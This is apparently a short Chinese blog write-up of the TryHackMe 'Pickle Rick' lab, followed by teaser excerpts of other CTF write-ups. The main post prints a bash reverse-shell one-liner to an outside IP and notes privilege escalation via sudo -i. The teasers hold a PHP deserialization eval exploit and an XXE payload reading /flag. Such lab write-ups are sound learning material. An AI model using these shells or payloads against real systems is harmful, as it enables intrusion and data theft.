[THM]Pickle Rick

发表于2025-05-28|更新于2025-06-01|学习

|浏览量:

一上来就是脑洞

网站首页源码找到用户名

扫目录扫到

/robots.txt给了个字符串，推测是密码

登录成功来到一个执行命令的页面

先看看有啥

第一个flag

1	tac Sup3rS3cretPickl3Ingred.txt

1
2

cat疑似被过滤

第二个flag

谜语人啊，clue.txt说在其他目录能找到，但又没说在哪

弹shell看看

1	bash -c "bash -i >& /dev/tcp/10.21.170.43/404 0>&1"

在/home/rick下找到

第三个flag

sudo -i直接提权了

然后在/root下找到

文章作者: lan1oc

文章链接: https://lan1oc.github.io/2025/05/28/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/THM/%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/[THM]Pickle%20Rick/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog！

相关推荐

第六届浙江省网络与信息安全竞赛初赛部分wp

前言初赛名次14，太爽了，被带飞了属于是，web都是做到最后几步出不来丢给大爹🤣🤣🤣 解题情况解题过程Web1.ezphpPHP反序列化，var_dump触发BBB，通过BBB中的param1触发CCC，通过CCC中的$this->func->aaa()触发AAA执行任意代码 exp如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phphighlight_file(___FILE___); class AAA{ public $cmd; public function __call($name, $arguments){ eval($this->cmd); return "done"; } }class BBB{ public $param1; public function...

MoeCTF 2023 部分write up

签到题hello CTFer给了个url，直接打开就有flag 然后提交就完了 WEBhttp下载一个叫WSRX的客户端连接一下开环境以后给的地址然后访问localhost:64824 然后就是完成这些任务，1、2有手就行 5就是将ua头的值换成MoeBrowser就行 3是将cookie中的character的值改为admin就行 4是在数据包添加一个字段 1X-Forwarded-For: 127.0.0.1 然后所有任务完成，flag就出了 web入门指北题目显示要解码得flag 先把附件下载下来看看，解压完是个pdf文档文档最后发现了一组神秘数字，要解码的应该就是这个了一眼十六进制，那就转字符一下，写个脚本 1234567891011original_hex_string = "66 6c 61 67 3d 62 57 39 6c 59 33 52 6d 65 33 63 7a 62 45 4e 76 62 57 56 66 56 47 39 66 62 57 39 6c 51 31 52 47 58 31 63 79 59 6c...

2024宁波市赛——天一永安杯初赛WP

前言残缺的队伍配上不好打的比赛😥 webweb-1直接看源码 1view-source:http://139.224.232.213:30333/ 1flag{2cfde35c1735cb1abfa071e7c982659907ffd9cd} 12奇葩的环境，一开始一直拒绝连接，开都开不起来，又是抢不到血的一场比赛😅 web-2看网页源码易知是xxe漏洞然后经过尝试，报错得到flag 1234567891011121314<?xml version="1.0" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % expr 'aaa)> <!ENTITY % file SYSTEM "file:///flag"> ...